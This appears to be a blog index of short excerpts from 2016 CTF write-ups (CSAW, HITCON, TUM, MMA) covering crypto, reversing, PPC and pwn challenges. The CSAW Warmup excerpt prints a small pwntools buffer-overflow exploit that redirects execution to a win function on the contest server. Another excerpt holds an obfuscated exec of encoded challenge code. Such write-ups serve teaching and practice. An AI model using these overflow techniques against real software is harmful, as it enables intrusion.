CSAW Quals 2016 :: Neo :: Crypto 200

Posted by and filed under CSAW Quals 2016.

We start out with just a link and a bit of text, the link points to http://crypto.chal.csaw.io:8001 – though this probably won’t live forever. Once you go to the page, you would probably notice a few things Looks like it’s from the early xp era Seems to be centered around some movie that it’s named… Read more »

HITCON CTF 2016::Handcrafted::Rev-50

Posted by and filed under HITCON CTF 2016.

We were given a python file for this challege #!/usr/bin/env python # -*- coding: utf-8 -*- import marshal, zlib, base64 exec(marshal.loads(zlib.decompress(base64.b64decode(‘eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMruckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfqmQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4AVAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ==’)))) After looking at the decompressed data, I realized that the header had been removed, so I compiled a pyc file and got the correct header. Here is my Get_Bytecodes.py #!/usr/bin/env python # -*- coding:… Read more »

HITCON CTF 2016::Flame::PPC-150

Posted by and filed under HITCON CTF 2016.

This was my first encounter with Power PC, so this challenge was definitely fun learning experience for me. Here is my best attempt at the decompiled source code. #include &ltstdio.h&gt #include &ltstdlib.h&gt #include &ltstring.h&gt int global_values[] = {0xCFE,0x859,0x95D,0x871,0x40D,6,0xADE,0xFA8,0x561,0x9DA, \ 0x878,0x682,0xFA9,0xF5F,0x25E,0xDB0,0xFBF,0xBC6,0xD38,0x95D,0xD09,0x7ED,0x307, \ 0x1C0,0x399,0x956,0xA45,0x292,0xC8A,0x92F,0x4A,0x964,0x194,0x9DA,0x11F}; int main(){ char input[35]; int *checked_against = global_values; int i; //print welcome string… Read more »

TUM CTF 2016::lolcpp::pwn-250

Posted by and filed under TUM CTF 2016.

We were given the source code for this challenge. #include <cstdint> #include <cstdio> #include <cstdlib> #include <cstring> #include <functional> #include <memory> #include <unistd.h> constexpr size_t entry_len = 0x50; void strip_newline(char *buf, size_t size) { char *p = &size[buf]; while (p >= buf) { if (0 == *p or ‘\n’ == *p) { *p = 0;… Read more »

CSAW Qual 2016::Rock::Rev-100

Posted by and filed under CSAW Quals 2016.

There is a struct in this program. struct Rock{ void *fp; int pass_fail; string *user_input1; string *user_input2; string *flag_str; }; Three interesting functions, which I have called init_struct, check_len_and_xor, and is_valid_key See the rest of this writeup here.

CSAW Qual 2016::Warmup::Pwn-50

Posted by and filed under CSAW Quals 2016.

This was a very easy challenge. Basically, there was a win function at the address that is bring printed : 0x40060D. This function can be called with a simple buffer overflow. Here is my Exploit.py from pwn import * win = 0x40060D payload = “A”*72 payload += p64(win) con = remote(‘pwn.chal.csaw.io’,8000) print con.recvline() print con.recvline()… Read more »

CSAW Qual 2016::Sleeping Guard::Crypto-50

Posted by and filed under CSAW Quals 2016.

With this challenge, they gave us an encrypted png. After a bit of trial and error I realized all I had to do was xor the first few bytes of the encrypted file with the standard header of a png. I just downloaded a sample file. Here is my get_key.py ecrypted = open(‘sleeping.png’,’rb’).read().decode(‘base64’) png =… Read more »

MMA CTF 2016::Palindrome::Prog-50

Posted by and filed under MMA CTF 2016.

The challenge reads as follows: Your task is to make a palindrome string by rearranging and concatenating given words. Input Format: N … Answer Format: Rearranged words separated by space. Each words contain only lower case alphabet characters. Example Input: 3 ab cba c Example Answer: ab c cba You have to connect to ppc1.chal.ctf.westerns.tokyo:31111(TCP)… Read more »

MMA CTF 2016::Reverse Box::Rev-50

Posted by and filed under MMA CTF 2016.

I found an unintended solution to this one, so I was pretty happy about that. The contents of the flag leads me to believe that I was intended to reverse a substitution cypher. But anyways, here is my solution. It was pretty obvious that I was dealing with some kind of cypher. The most important… Read more »